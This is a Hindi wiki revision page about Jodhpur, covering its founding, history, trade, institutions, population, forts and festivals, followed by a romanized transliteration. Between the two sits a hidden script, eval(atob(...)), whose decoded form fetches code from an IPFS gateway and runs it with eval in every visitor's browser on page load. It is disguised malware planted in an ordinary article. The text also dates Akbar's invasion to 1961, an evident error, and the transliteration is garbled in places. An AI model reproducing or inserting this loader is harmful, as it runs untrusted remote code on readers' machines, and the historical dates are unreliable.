Difference between revisions of "जोधपुर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
 
{{tocright}}
 
{{tocright}}
जोधपुर [[भारत]] के राजपूत राजाओं का एक प्रमुख गढ़ रहा है। इसकी स्‍थापना 1459 में राव जोधा ने किया था। जोधपुर मारवाड़ों का मुख्‍य वित्तिय राजधानी था, जहाँ [[राठौड़ वंश]] ने शासन किया था। जोधपुर [[थार मरुस्‍थल]] के दाहिने छोर पर स्थित है।   
+
==स्थापना==
 +
जोधपुर शहर, जोधपुर ज़िले का प्रशासनिक मुख्यालय, [[राजस्थान]] राज्य, पश्चिमोत्तर भारत में है, इसकी स्थापना एक राजपूत [[राव जोधा]] ने 1459 में की थी और यह भूतपूर्व जोधपुर रियासत की राजधानी था। शहर के कुछ हिस्से 18वीं शताब्दी के परकोटे से घिरे हुए हैं। यह दुर्ग, जिसमें महल और ऐतिहासिक संग्रहालय हैं, एक अलग-थलग, लेकिन ऊँची चट्टान पर बना हुआ है, जो दूर से ही दिखाई देता है। इसके ठीक उत्तर में [[मारवाड़]] की प्राचीन राजधानी मंडौर के चौथी शताब्दी के अवशेष विद्यमान हैं। जोधपुर मारवाड़ों का मुख्‍य वित्तिय राजधानी था, जहाँ [[राठौड़ वंश]] ने शासन किया था। जोधपुर [[थार मरुस्‍थल]] के दाहिने छोर पर स्थित है।
 +
==इतिहास==
 +
1961 में मुग़ल बादशाह [[अकबर]] के आक्रमण के बाद इसने मुग़लों का प्रभुत्व स्वीकार कर लिया। 1679 में मुग़ल बादशाह [[औरंगज़ेब]] ने मारवाड़ पर हमला करके इसे लूटा और यहाँ के निवासियों को [[इस्लाम धर्म]] स्वीकार करने को मज़बूर किया, लेकिन जोधपुर, [[जयपुर]] और [[उदयपुर]] की रियासतों ने गठबंधन बनाकर मुसलमानों के नियंत्रण को रोके रखा। इसके बाद जयपुर और जोधपुर के राजकुमारों को उदयपुर परिवार के साथ वैवाहिक सम्बन्ध करने का अधिकार (जो मुग़लों के साथ मित्रता के कारण समाप्त हो गया था) इस शर्त पर फिर से प्राप्त हो गया कि उदयपुर की राजकुमारियों से उत्पन्न बच्चे पहले उत्तराधिकारी होंगे। लेकिन इस शर्त से उत्पन्न झगड़ों के कारण अन्ततः यहाँ मराठों का प्रभुत्व क़ायम हो गया। 1818 में जोधपुर ब्रिटिश सत्ता के अंतर्गत आ गया। 1949 में यह राजस्थान राज्य में शामिल हो गया।
 +
==यातायात और परिवहन==
 +
जोधपुर प्रमुख सड़क और रेल जंक्शन वाला शहर है।
 +
==कृषि और खनिज==
 +
यह शहर कृषि उपज, ऊन, मवेशी, नमक और चमड़े का विपणन केन्द्र है।
 +
==उद्योग और व्यापार==
 +
यहाँ इंजीनियरिंग और रेल की कार्यशालाएँ हैं व साथ ही सूती वस्त्र, पीतल तथा लोहे के बर्तन, साइकिल, स्याही और पोलो के उपकरणों का निर्माण होता है। जोधपुर अपने हस्तशिल्प उत्पादों के लिए प्रख्यात है, जिसमें हाथीदाँत का सामान, काँच की चूड़ियाँ, छुरी—काँटा, रंगे हुए वस्त्र, लाख की वस्तुएँ, नमदे, चमड़े का सामान, संगमरमर के पत्थर का काम और क़ालीनों की बुनाई प्रमुख है।
 +
==उच्च न्यायालय==
 +
राजस्थान के दूसरे सबसे बड़े शहर जोधपुर में राज्य का उच्च न्यायालय स्थित है।
 +
==शिक्षण संस्थान==
 +
यहाँ अन्य संस्थानों के साथ-साथ:-
 +
*जोधपुर विश्वविद्यालय,
 +
*एम॰बी॰एम॰ इंजीनियरिंग कालेज,
 +
*डाक्टर एस॰एन॰ मेडिकल कालेज,
 +
*जे॰डी॰ मेमोरियल फ़ैकल्टी आफ़ फ़ार्मेसी,
 +
*गवर्नमेंट पालीटेक्निक कालेज और
 +
*जय नारायण व्यास विश्वविद्यालय (1962 में स्थापित) स्थित है।
 +
==जनसंख्या==
 +
जोधपुर शहर की जनसंख्या (2001) 8,46,408 है। और जोधपुर ज़िले की कुल  जनसंख्या 28,80,777 है।
 
==पर्यटन==
 
==पर्यटन==
 
भारत में राजस्‍थान को मरुस्‍थलों का राजा कहा जाता है। यहाँ अनेक ऐसे स्‍थान हैं जो पर्यटकों को अपनी ओर आकर्षित करते हैं। इन्‍हीं में से एक है-जोधपुर। 15वीं शदी में निर्मित क़िला और महलें यहाँ आने वाले पर्यटकों के लिए आकर्षण का प्रमुख केंद्र रहा है। पहाड़ी के शिखर और शहर के अंतिम छोर पर अवस्थित मेहरानगढ़ का क़िला मध्‍यकालीन राजशाही का मानो प्रति‍बिंब है।
 
भारत में राजस्‍थान को मरुस्‍थलों का राजा कहा जाता है। यहाँ अनेक ऐसे स्‍थान हैं जो पर्यटकों को अपनी ओर आकर्षित करते हैं। इन्‍हीं में से एक है-जोधपुर। 15वीं शदी में निर्मित क़िला और महलें यहाँ आने वाले पर्यटकों के लिए आकर्षण का प्रमुख केंद्र रहा है। पहाड़ी के शिखर और शहर के अंतिम छोर पर अवस्थित मेहरानगढ़ का क़िला मध्‍यकालीन राजशाही का मानो प्रति‍बिंब है।

Revision as of 13:25, 5 June 2010

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sthapana

jodhapur shahar, jodhapur zile ka prashasanik mukhyalay, rajasthan rajy, pashchimottar bharat mean hai, isaki sthapana ek rajapoot rav jodha ne 1459 mean ki thi aur yah bhootapoorv jodhapur riyasat ki rajadhani tha. shahar ke kuchh hisse 18vian shatabdi ke parakote se ghire hue haian. yah durg, jisamean mahal aur aitihasik sangrahalay haian, ek alag-thalag, lekin ooanchi chattan par bana hua hai, jo door se hi dikhaee deta hai. isake thik uttar mean marava d ki prachin rajadhani mandaur ke chauthi shatabdi ke avashesh vidyaman haian. jodhapur marava doan ka mukhh‍y vittiy rajadhani tha, jahaan rathau d vansh ne shasan kiya tha. jodhapur thar marush‍thal ke dahine chhor par sthit hai.

itihas

1961 mean mugal badashah akabar ke akraman ke bad isane mugaloan ka prabhutv svikar kar liya. 1679 mean mugal badashah aurangazeb ne marava d par hamala karake ise loota aur yahaan ke nivasiyoan ko islam dharm svikar karane ko mazaboor kiya, lekin jodhapur, jayapur aur udayapur ki riyasatoan ne gathabandhan banakar musalamanoan ke niyantran ko roke rakha. isake bad jayapur aur jodhapur ke rajakumaroan ko udayapur parivar ke sath vaivahik sambandh karane ka adhikar (jo mugaloan ke sath mitrata ke karan samapt ho gaya tha) is shart par phir se prapt ho gaya ki udayapur ki rajakumariyoan se utpann bachche pahale uttaradhikari hoange. lekin is shart se utpann jhag doan ke karan antatah yahaan marathoan ka prabhutv qayam ho gaya. 1818 mean jodhapur british satta ke aantargat a gaya. 1949 mean yah rajasthan rajy mean shamil ho gaya.

yatayat aur parivahan

jodhapur pramukh s dak aur rel jankshan vala shahar hai.

krishi aur khanij

yah shahar krishi upaj, oon, maveshi, namak aur cham de ka vipanan kendr hai.

udyog aur vyapar

yahaan ianjiniyariang aur rel ki karyashalaean haian v sath hi sooti vastr, pital tatha lohe ke bartan, saikil, syahi aur polo ke upakaranoan ka nirman hota hai. jodhapur apane hastashilp utpadoan ke lie prakhyat hai, jisamean hathidaant ka saman, kaanch ki choo diyaan, chhuri—kaanta, range hue vastr, lakh ki vastuean, namade, cham de ka saman, sangamaramar ke patthar ka kam aur qalinoan ki bunaee pramukh hai.

uchch nyayalay

rajasthan ke doosare sabase b de shahar jodhapur mean rajy ka uchch nyayalay sthit hai.

shikshan sansthan

yahaan any sansthanoan ke sath-sath:-

  • jodhapur vishvavidyalay,
  • em॰bi॰em॰ ianjiniyariang kalej,
  • daktar es॰en॰ medikal kalej,
  • je॰di॰ memoriyal faikalti af farmesi,
  • gavarnameant paliteknik kalej aur
  • jay narayan vyas vishvavidyalay (1962 mean sthapit) sthit hai.

janasankhya

jodhapur shahar ki janasankhya (2001) 8,46,408 hai. aur jodhapur zile ki kul janasankhya 28,80,777 hai.

paryatan

bharat mean rajash‍than ko marush‍thaloan ka raja kaha jata hai. yahaan anek aise sh‍than haian jo paryatakoan ko apani or akarshit karate haian. inh‍hian mean se ek hai-jodhapur. 15vian shadi mean nirmit qila aur mahalean yahaan ane vale paryatakoan ke lie akarshan ka pramukh keandr raha hai. paha di ke shikhar aur shahar ke aantim chhor par avasthit meharanagadh ka qila madhh‍yakalin rajashahi ka mano prati‍bianb hai.

meharanagadh ka qila

  • jodhapur meharanagadh ka qila paha di ke bilh‍kul oopar base hone ke karan rajash‍than ke sabase khoobasoorat qiloan mean se ek hai.
  • is qile ke sauandary ko shrriankhalabaddh roop se bane dvar aur bhi badhate haian.
    • inh‍hian dvaroan mean se ek hai-jayapol. isaka nirman raja manasianh ne 1806 eesh‍vi mean kiya tha.
    • doosare dvar ka nam hai-vijayadvar. isaka nirman raja ajit sianh ne mugaloan par vijay ke upalakshh‍y mean kiya tha.
  • qile ke aandar mean bhi paryatakoan ko dekhane hetu kee mahath‍vapoorn imaratean haian:- jaise moti mahal, sukh mahal, phoolamahal adi-adi.

jasavant tha da

  • jodhapur mean yah jasavant tha da hai.
  • yah poori tarah se marbal nirmit hai.
  • isaka nirman 1899 mean raja jasavant sianh dvitiy aur unake sainikoan ki yad mean kiya gaya tha.
  • isaki kalakriti aj bhi paryatakoan ko apani or akarshit karata hai.

umh‍maid mahal

  • jodhapur ke is mahal ka nirman maharaja umh‍maid sianh ne san 1943 mean kiya tha.
  • marbal aur baloo ka path‍thar se bane is mahal ka drishh‍y paryatakoan ko khasataur par lubhata hai.
  • is mahal ke sangrahalay mean puratan yug ki ghadiyaan aur peantiangh‍s bhi sanrakshit haian.

khanapan

yahaan khasataur par doodh nirmit khady padarthoan ka jh‍yada prayog hota hai. jaise mava ka laddoo, krim yukh‍t lash‍si, mava kachau di, aur doodh phirani adi.

uth‍sav

  • jodhapur mean kuchh pramukh utsav hai jo b de hi dhoom-dham se manaya jata hai.
  • marava d uth‍sav, nagaur ka prasiddh pashu mela, kaga mean shitalamata ka uth‍sav aur pipar ka ganguar mela.